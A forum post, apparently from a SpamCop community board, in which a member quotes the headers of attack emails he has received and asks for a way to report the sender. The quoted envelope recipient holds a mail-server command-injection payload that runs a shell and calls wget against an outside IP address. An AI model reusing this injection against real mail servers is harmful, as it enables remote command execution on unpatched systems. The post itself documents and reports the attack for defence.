Jump to content

James Carlson

Members
  • Content Count

    1
  • Joined

  • Last visited

Community Reputation

0 Neutral

About James Carlson

  • Rank
    Newbie
  1. I've been receiving a fair bit of attack email (not precisely "spam") that looks like this: Return-Path: <root@sab.com> Received: from sab.com (server.mjm3d.ir [46.4.144.70]) by carlson.workingcode.com (8.15.2/8.15.2/SUSE Linux 0.8) with SMTP id x6BEj0kO003665 for <root+${run{\x2Fbin\x2Fsh\t-c\t\x22wget\x20199.204.214.40\x2fsbz\x2f50.78.21.49\x22}}@carlson.workingcode.com>; Thu, 11 Jul 2019 10:45:02 -0400 Authentication-Results:carlson.workingcode.com; dkim=permerror (bad message/signature format) Date: Thu, 11 Jul 2019 10:45:00 -0400 From: root@sab.com Message-Id: <201907111445.x6BEj0kO003665@carlson.workingcode.com> Received: 1 [...] Received: 31 To: undisclosed-recipients:; The body is empty, and thus the spamcop web UI won't allow me to report it. As you can see above, the entire contents of message is actually contained in the ENVELOPE_TO -- it's apparently an attempt to get some sort of defective mail delivery agent to execute a shell scri_pt so that the sender can build a database of vulnerable systems. It would be nice to be able to report the sender and the site he's using for his data gathering (199.204.214.40). I'm doing it manually now, but having this sort of thing supported through spamcop would, I think, make some sense.
×